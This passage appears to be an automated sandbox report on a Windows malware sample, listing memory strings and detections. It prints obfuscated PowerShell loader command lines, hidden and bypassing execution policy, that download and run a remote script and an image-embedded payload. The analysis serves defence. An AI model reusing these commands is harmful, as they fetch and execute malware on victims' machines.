ystem.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: `2dnlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.
Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinst
Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run(""C:\Windows\sySteM32\wINDowSpOWersHELL\v1.0\POwersHeLL.eXe" "PoWeRShELL -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkA", "0")
PowerShell case anomaly found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySteM32\wINDowSpOWersHELL\v1.0\POwersHeLL.eXe" "PoWeRShELL -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== "
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySteM32\wINDowSpOWersHELL\v1.0\POwersHeLL.eXe" "PoWeRShELL -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== " Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySteM32\wINDowSpOWersHELL\v1.0\POwersHeLL.eXe" "PoWeRShELL -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaIwB4NyssaCMNyssaLgBlNyssaCMNyssaYQBtNyssaC8NyssaZNyssaBuNyssaGkNyssaawNyssavNyssaG0NyssabwBjNyssaC4NyssadwBzNyssaGUNyssadgBhNyssaHcNyssabQBlNyssaHINyssaLgBhNyssaGUNyssaZNyssaNyssavNyssaC8NyssaOgBwNyssaCMNyssaIwBoNyssaCcNyssaOwNyssakNyssaGINyssadQBtNyssaHNyssaNyssaZQByNyssaHMNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaLQByNyssaGUNyssacNyssaBsNyssaGENyssaYwBlNyssaCNyssaNyssaJwNyssajNyssaCcNyssaLNyssaNyssagNyssaCcNyssadNyssaNyssanNyssaDsNyssaJNyssaBtNyssaGUNyssadNyssaBhNyssaGwNyssabNyssaBhNyssaGMNyssaeQBjNyssaGwNyssaZQNyssagNyssaD0NyssaINyssaNyssanNyssaGgNyssadNyssaB0NyssaHNyssaNyssacwNyssa6NyssaC8NyssaLwBpNyssaGENyssaONyssaNyssawNyssaDNyssaNyssaNwNyssawNyssaDUNyssaLgB1NyssaHMNyssaLgBhNyssaHINyssaYwBoNyssaGkNyssadgBlNyssaC4NyssabwByNyssaGcNyssaLwNyssaxNyssaDQNyssaLwBpNyssaHQNyssaZQBtNyssaHMNyssaLwBuNyssaGUNyssadwBfNyssaGkNyssabQBhNyssaGcNyssaZQBfNyssaDINyssaMNyssaNyssayNyssaDUNyssaMNyssaNyssazNyssaDINyssaNNyssaNyssavNyssaG4NyssaZQB3NyssaF8NyssaaQBtNyssaGENyssaZwBlNyssaC4NyssaagBwNyssaGcNyssaJwNyssa7NyssaCQNyssaYgBlNyssaG4NyssaegBvNyssaHQNyssaaNyssaBpNyssaG8NyssacNyssaB5NyssaHINyssaYQBuNyssaCNyssaNyssaPQNyssagNyssaE4NyssaZQB3NyssaC0NyssaTwBiNyssaGoNyssaZQBjNyssaHQNyssaINyssaBTNyssaHkNyssacwB0NyssaGUNyssabQNyssauNyssaE4NyssaZQB0NyssaC4NyssaVwBlNyssaGINyssaQwBsNyssaGkNyssaZQBuNyssaHQNyssaOwNyssakNyssaGINyssaYQB0NyssaGYNyssabwB3NyssaGwNyssaaQBuNyssaGcNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBiNyssaGUNyssabgB6NyssaG8NyssadNyssaBoNyssaGkNyssabwBwNyssaHkNyssacgBhNyssaG4NyssaLgBENyssaG8NyssadwBuNyssaGwNyssabwBhNyssaGQNyssaRNyssaBhNyssaHQNyssaYQNyssaoNyssaCQNyssabQBlNyssaHQNyssaYQBsNyssaGwNyssaYQBjNyssaHkNyssaYwBsNyssaGUNyssaKQNyssa7NyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaCNyssaNyssaPQNyssagNyssaFsNyssaUwB5NyssaHMNyssadNyssaBlNyssaG0NyssaLgBUNyssaGUNyssaeNyssaB0NyssaC4NyssaRQBuNyssaGMNyssabwBkNyssaGkNyssabgBnNyssaF0NyssaOgNyssa6NyssaFUNyssaVNyssaBGNyssaDgNyssaLgBHNyssaGUNyssadNyssaBTNyssaHQNyssacgBpNyssaG4NyssaZwNyssaoNyssaCQNyssaYgBhNyssaHQNyssaZgBvNyssaHcNyssabNyssaBpNyssaG4NyssaZwNyssapNyssaDsNyssaJNyssaBwNyssaG8NyssadNyssaBhNyssaHMNyssacwBpNyssaGYNyssaZQByNyssaG8NyssadQBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaPNyssaNyssa8NyssaEINyssaQQBTNyssaEUNyssaNgNyssa0NyssaF8NyssaUwBUNyssaEENyssaUgBUNyssaD4NyssaPgNyssanNyssaDsNyssaJNyssaBoNyssaGUNyssacgBiNyssaGkNyssadgBvNyssaHINyssaaQB0NyssaHkNyssaINyssaNyssa9NyssaCNyssaNyssaJwNyssa8NyssaDwNyssaQgBBNyssaFMNyssaRQNyssa2NyssaDQNyssaXwBFNyssaE4NyssaRNyssaNyssa+NyssaD4NyssaJwNyssa7NyssaCQNyssabgBhNyssaGINyssabwBiNyssaGUNyssacgB5NyssaCNyssaNyssaPQNyssagNyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaC4NyssaSQBuNyssaGQNyssaZ
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySteM32\wINDowSpOWersHELL\v1.0\POwersHeLL.eXe" "PoWeRShELL -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== " Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaIwB4NyssaCMNyssaLgBlNyssaCMNyssaYQBtNyssaC8NyssaZNyssaBuNyssaGkNyssaawNyssavNyssaG0NyssabwBjNyssaC4NyssadwBzNyssaGUNyssadgBhNyssaHcNyssabQBlNyssaHINyssaLgBhNyssaGUNyssaZNyssaNyssavNyssaC8NyssaOgBwNyssaCMNyssaIwBoNyssaCcNyssaOwNyssakNyssaGINyssadQBtNyssaHNyssaNyssaZQByNyssaHMNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaLQByNyssaGUNyssacNyssaBsNyssaGENyssaYwBlNyssaCNyssaNyssaJwNyssajNyssaCcNyssaLNyssaNyssagNyssaCcNyssadNyssaNyssanNyssaDsNyssaJNyssaBtNyssaGUNyssadNyssaBhNyssaGwNyssabNyssaBhNyssaGMNyssaeQBjNyssaGwNyssaZQNyssagNyssaD0NyssaINyssaNyssanNyssaGgNyssadNyssaB0NyssaHNyssaNyssacwNyssa6NyssaC8NyssaLwBpNyssaGENyssaONyssaNyssawNyssaDNyssaNyssaNwNyssawNyssaDUNyssaLgB1NyssaHMNyssaLgBhNyssaHINyssaYwBoNyssaGkNyssadgBlNyssaC4NyssabwByNyssaGcNyssaLwNyssaxNyssaDQNyssaLwBpNyssaHQNyssaZQBtNyssaHMNyssaLwBuNyssaGUNyssadwBfNyssaGkNyssabQBhNyssaGcNyssaZQBfNyssaDINyssaMNyssaNyssayNyssaDUNyssaMNyssaNyssazNyssaDINyssaNNyssaNyssavNyssaG4NyssaZQB3NyssaF8NyssaaQBtNyssaGENyssaZwBlNyssaC4NyssaagBwNyssaGcNyssaJwNyssa7NyssaCQNyssaYgBlNyssaG4NyssaegBvNyssaHQNyssaaNyssaBpNyssaG8NyssacNyssaB5NyssaHINyssaYQBuNyssaCNyssaNyssaPQNyssagNyssaE4NyssaZQB3NyssaC0NyssaTwBiNyssaGoNyssaZQBjNyssaHQNyssaINyssaBTNyssaHkNyssacwB0NyssaGUNyssabQNyssauNyssaE4NyssaZQB0NyssaC4NyssaVwBlNyssaGINyssaQwBsNyssaGkNyssaZQBuNyssaHQNyssaOwNyssakNyssaGINyssaYQB0NyssaGYNyssabwB3NyssaGwNyssaaQBuNyssaGcNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBiNyssaGUNyssabgB6NyssaG8NyssadNyssaBoNyssaGkNyssabwBwNyssaHkNyssacgBhNyssaG4NyssaLgBENyssaG8NyssadwBuNyssaGwNyssabwBhNyssaGQNyssaRNyssaBhNyssaHQNyssaYQNyssaoNyssaCQNyssabQBlNyssaHQNyssaYQBsNyssaGwNyssaYQBjNyssaHkNyssaYwBsNyssaGUNyssaKQNyssa7NyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaCNyssaNyssaPQNyssagNyssaFsNyssaUwB5NyssaHMNyssadNyssaBlNyssaG0NyssaLgBUNyssaGUNyssaeNyssaB0NyssaC4NyssaRQBuNyssaGMNyssabwBkNyssaGkNyssabgBnNyssaF0NyssaOgNyssa6NyssaFUNyssaVNyssaBGNyssaDgNyssaLgBHNyssaGUNyssadNyssaBTNyssaHQNyssacgBpNyssaG4NyssaZwNyssaoNyssaCQNyssaYgBhNyssaHQNyssaZgBvNyssaHcNyssabNyssaBpNyssaG4NyssaZwNyssapNyssaDsNyssaJNyssaBwNyssaG8NyssadNyssaBhNyssaHMNyssacwBpNyssaGYNyssaZQByNyssaG8NyssadQBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaPNyssaNyssa8NyssaEINyssaQQBTNyssaEUNyssaNgNyssa0NyssaF8NyssaUwBUNyssaEE